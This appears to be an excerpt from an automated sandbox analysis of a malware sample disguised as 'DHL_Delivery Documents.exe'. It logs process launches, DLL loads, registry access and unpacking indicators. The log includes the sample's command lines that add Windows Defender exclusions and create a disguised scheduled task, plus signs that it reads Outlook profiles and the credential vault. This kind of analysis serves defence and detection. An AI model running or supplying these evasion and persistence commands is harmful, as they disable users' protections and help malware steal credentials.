Source: unknown Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe"
Source: unknown Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe C:\Users\user\AppData\Roaming\YybGLWQSx.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe"
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Process created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe"
Source: C:\Windows\SysWOW64\setx.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DHL_Delivery Documents.exe" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp3106.tmp" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Process created: C:\Users\user\Desktop\DHL_Delivery Documents.exe "C:\Users\user\Desktop\DHL_Delivery Documents.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YybGLWQSx" /XML "C:\Users\user\AppData\Local\Temp\tmp4C1F.tmp" Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Process created: C:\Users\user\AppData\Roaming\YybGLWQSx.exe "C:\Users\user\AppData\Roaming\YybGLWQSx.exe" Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Process created: C:\Windows\SysWOW64\setx.exe "C:\Windows\SysWOW64\setx.exe" Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YybGLWQSx.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Section loaded: wininet.dll
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Section loaded: mswsock.dll
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\VuUYgaAtyiysyfJGpQTeLcWhpmRrpASZmySdBWsiNRjrHvaqlbIOIemMySRwxdZx\OoIHIwIlaOHZFTFWeSHYCjEJ.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\DHL_Delivery Documents.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\setx.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: DHL_Delivery Documents.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: DHL_Delivery Documents.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: DHL_Delivery Documents.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3278494163.000000000060E000.00000002.00000001.01000000.0000000A.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000013.00000002.3278640060.000000000060E000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: wntdll.pdbUGP source: DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DHL_Delivery Documents.exe, DHL_Delivery Documents.exe, 00000008.00000002.2633141011.0000000001BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, setx.exe, 00000012.00000003.2632462016.0000000002882000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002BE0000.00000040.00001000.00020000.00000000.sdmp, setx.exe, 00000012.00000003.2634170956.0000000002A39000.00000004.00000020.00020000.00000000.sdmp, setx.exe, 00000012.00000002.3280086458.0000000002D7E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: setx.pdbGCTL source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: setx.pdb source: DHL_Delivery Documents.exe, 00000008.00000002.2632980952.0000000001788000.00000004.00000020.00020000.00000000.sdmp, OoIHIwIlaOHZFTFWeSHYCjEJ.exe, 00000011.00000002.3279344083.0000000001228000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: JeWB.pdbSHA256 source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr
Source: Binary string: JeWB.pdb source: DHL_Delivery Documents.exe, YybGLWQSx.exe.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: DHL_Delivery Documents.exe, BufferingPage.cs .Net Code: InitializeComponent
Source: YybGLWQSx.exe.0.dr, BufferingPage.cs .Net Code: InitializeComponent
Source: 0.2.DHL_Delivery Documents.exe.62c0000.5.raw.unpack, RU6c2kU9YKG76GBYRe.cs .Net Code: PHLl19SWnJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL_Delivery Documents.exe.4351058.2.raw.unpack, RU6c2kU9YKG76GBYRe.cs .Net Code: PHLl19SWnJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL_Delivery Documents.exe.5350000.3.raw.unpack, LoginForm.cs .Net Code: _206B_206C_202A_202D_206F_206F_206C_202D_206A_202A_200B_206C_206E_206A_206D_206B_202C_206E_200C_206F_200D_206D_200C_200F_202C_206C_202E_206B_202B_202E_206E_206B_206B_206D_206C_202C_200D_202E_202C_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 18.2.setx.exe.320cd08.2.raw.unpack, BufferingPage.cs .Net Code: InitializeComponent
Source: 19.0.OoIHIwIlaOHZFTFWeSHYCjEJ.exe.280cd08.1.raw.unpack, BufferingPage.cs .Net Code: InitializeComponent
